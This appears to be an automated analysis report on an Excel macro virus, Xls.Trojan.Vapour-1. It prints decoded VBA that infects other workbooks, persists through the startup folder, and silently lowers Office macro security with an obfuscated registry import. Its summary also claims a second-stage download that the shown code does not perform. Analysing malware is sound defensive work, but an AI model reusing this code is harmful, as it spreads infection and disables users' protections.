Xls.Trojan.Vapour-1 Office (OLE) malware analysis — malicious · 090262c1fa335691

MALICIOUS

Office (OLE)

24.5 KB Created: 1999-07-25 12:28:16 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 91bedf60ea3b6a685c4f307bf9b8c0bb SHA-1: 71b34c63b85d7cd213c49f3a1418373bf5710681 SHA-256: 090262c1fa335691c7b0f77bbfaf2358925cffae71ccd077fb5738dc9ec9d0a6

200 Risk Score

Malware Insights

Xls.Trojan.Vapour-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is an Excel document containing malicious VBA macros. The macros attempt to obfuscate themselves and then use the Shell() function to execute arbitrary code. The script also attempts to write to a registry file at 'c:\Windows\Office.reg' and save a file named 'Book1.' in the Excel startup path, indicating an attempt to establish persistence or download a second-stage payload.

Heuristics 3

ClamAV: Xls.Trojan.Vapour-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Vapour-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	20926 bytes
SHA-256: `0d30b6934462423248cd1230f328214a3188518c49fcb5b98ac7fc7342331fbb`
Detection ClamAV: Xls.Trojan.Vapour-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Sub Workbook_Deactivate() On Error Resume Next Set a = ActiveWorkbook Set c = a.VBProject.VBComponents("ThisWorkbook") Set B = c.CodeModule Set L = B.Lines Set t = ThisWorkbook Set i = t.VBProject.VBComponents("ThisWorkbook") Set z = i.CodeModule If L(2, 1) <> "On Error Resume Next" Then B.deletelines 1, B.countoflines ' B.Insertlines 1, z.Lines(1, z.countoflines) ' ' ' ' ' ' End If For n = 9 To z.countoflines: Randomize ' ' ma = Int((Rnd * 4) + 1) If z.Lines(n, 1) = "'" And ma >= 2 Then ' z.deletelines n, 1 End If: Next n ' ' ' For i = 9 To z.countoflines: Randomize ma = Int((Rnd * 4) + 1) If ma <= 2 Then ' ' z.f i, "'" ' End If : Next i ' ' If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1." Open "c:\Windows\Office.reg" For Output As 1 Print #1, Chr(82) + Chr(69) + Chr(71) + Chr(69) + Chr(68) + Chr(73) + Chr(84) + Chr(52) Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(56) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(93) Print #1, Chr(34) + Chr(79) + Chr(112) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(115) + Chr(54) + Chr(34) + Chr(61) + Chr(100) + Chr(119) + Chr(111) + Chr(114) + Chr(100) + Chr(58) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(57) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93) Print #1, Chr(34) + Chr(76) + Chr(101) + Chr(118) + Chr(101) + Chr(108) + Chr(34) + Chr(61) + Chr(100) + Chr(119) + Chr(111) + Chr(114) + Chr(100) + Chr(58) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(49) Close 1 Shell "regedit /s c:\Windows\Office.reg", vbHide End If If (Day(Now)) = (Minute(Now)) Then MsgBox Chr(89) + Chr(111) + Chr(117) + Chr(96) + Chr(108) + Chr(108) + Chr(32) + Chr(70) + Chr(111) + Chr(114) + Chr(101) + Chr(118) + Chr(101) + Chr(114) + Chr(32) + Chr(98) + Chr(101) + Chr(32) + Chr(97) + Chr(32) + Chr(118) + Chr(97) + Chr(112) + Chr(111) + Chr(117) + Chr(114) + Chr(32) + Chr(116) + Chr(114) + Chr(105) + Chr(97) + Chr(108) + Chr(32) + Chr(105) + Chr(110) + Chr(32) + Chr(109) + Chr(121) + Chr(32) + Chr(115) + Chr(107) + Chr(105) + Chr(101) + Chr(115), vbInformation, Chr(86) + Chr(97) + Chr(80) + Chr(111) + Chr(85) + Chr(114) + Chr(32) + Chr(84) + Chr(114) + Chr(65) + Chr(105) + Chr(76) End If End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute V ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.